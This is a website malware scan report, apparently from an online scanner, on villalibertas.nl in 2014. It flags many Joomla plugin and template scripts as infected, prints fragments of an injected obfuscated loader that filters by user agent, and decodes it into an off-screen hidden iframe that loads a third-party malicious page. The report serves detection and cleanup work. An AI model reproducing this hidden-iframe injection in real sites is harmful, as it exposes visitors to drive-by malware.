Scanned pages/files
Request | Server response | Status |
http://villalibertas.nl/ | 200 OK Content-Length: 13085 Content-Type: text/html | clean |
http://villalibertas.nl/media/system/js/caption.js | 200 OK Content-Length: 3832 Content-Type: application/x-javascript | clean |
http://villalibertas.nl/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 9962 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The snippet is cut off in the middle of its user-agent list:
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire [...]
Antivirus reports:
| ||
http://villalibertas.nl/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 18345 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The snippet is cut off in the middle of its user-agent list:
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire [...]
Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe>
(The decoded payload is an iframe positioned off-screen at -1320px, so a visitor does not see it while the browser still loads the page from the third-party host. The same iframe is reported for the other files marked malicious below, so they should be checked and cleaned together.)
Antivirus reports:
| ||
http://villalibertas.nl/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 14123 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 4228 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire Antivirus reports:
| ||
http://villalibertas.nl/modules/mod_news_show_gk2/scripts/engine.js | 200 OK Content-Length: 5502 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire NV--; $E('.gk_news_show_panel_amount_value',el).setHTML(NR-NV); Cookie.set('gk_news_show_amount'+TID, (NR-NV), {duration: 14,path: "/"}); if(list){ for(var k=0;k<NC;k++){ if(((NR-NV)*NC)-(1+k) < amountOfLi) listOfLi[((NR-NV)*NC)-(1+k)].setStyle('display','none'); } } } }); } } }); }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/modules/mod_gk_news_image_5/js/engine.js | 200 OK Content-Length: 8163 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire if(!play) this.image_pause($G); if((play || $G["autoanim"] == 1) && ($G["actual_anim"] == false)){ $G["actual_anim"] = (function(){ n = (n < max) ? n+1 : 0; $this.image_anim(elID,mainwrap,wrap,slides,n,contents,$G,true); }).periodical($G["anim_speed"]*2+$G["anim_interval"]); } } }, image_pause : function($G){ $clear($G["actual_anim"]); $G["actual_anim"] = false; } }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/modules/mod_gk_news_image_5/js/importer.php?mid=news_image_5_1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.45 | 200 OK Content-Length: 219 Content-Type: text/javascript | clean |
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/template_scripts.js | 200 OK Content-Length: 3814 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire if(h > max_height) max_height = h; }); $ES('.users', $('bottom_wrap')).each(function(el, i){ el.getChildren()[0].setStyle("height", max_height+"px"); }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk16_style',style,{duration: 200,path: "/"}); actual_style = style; } Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/jmenu_2.js | 200 OK Content-Length: 3755 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire levels.each(function(e,k){ e.each(function(a,l){ a.addEvent("mouseenter",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].toggle(); (function(){a.getChildren()[1].setStyle("overflow","")}).delay(500); }); a.addEvent("mouseleave",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].stop(); effects2[k][l].set(0); }); }); }); }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports:
| ||
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/ie.js | 200 OK Content-Length: 2259 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The snippet shows the start of the injected block, cut off in the middle of its user-agent list, followed by the end of the file:
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire [...] } } })(); sfHover = function() { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover);
Decoded script: function () { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfHover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfHover\\b"), "");}; } } <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe>
(The decoded output contains two separate things. The sfHover function only toggles a CSS class on the LI elements of the "horiz-menu" element and appears to be the file's own menu code. The off-screen iframe after it is the injected part.)
Antivirus reports:
| ||
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit | 200 OK Content-Length: 1475 Content-Type: text/javascript | clean |
http://villalibertas.nl/./ | 200 OK Content-Length: 13087 Content-Type: text/html | clean |
http://villalibertas.nl/welcome.html | 200 OK Content-Length: 22356 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: villalibertas.nl
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:23:50 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:23:51 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4fafe161220916b4800d2e652a652cb6=4d20623bd3c52bb4ca32bc7d3460a371; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: villalibertas.nl
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:23:50 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:23:51 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4fafe161220916b4800d2e652a652cb6=4d20623bd3c52bb4ca32bc7d3460a371; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: villalibertas.nl
Referer: http://www.google.com/search?q=villalibertas.nl
Result:
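The result is similar to the first query: no suspicious redirects were found. This check looks only at the HTTP response to the request shown, so it does not cover the JavaScript files flagged as malicious in the scan above, which the browser loads after the page is delivered.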
GET / HTTP/1.1
Host: villalibertas.nl
Referer: http://www.google.com/search?q=villalibertas.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=villalibertas.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://villalibertas.nl/
Result: villalibertas.nl is not infected or malware details are not published yet.
Result: villalibertas.nl is not infected or malware details are not published yet.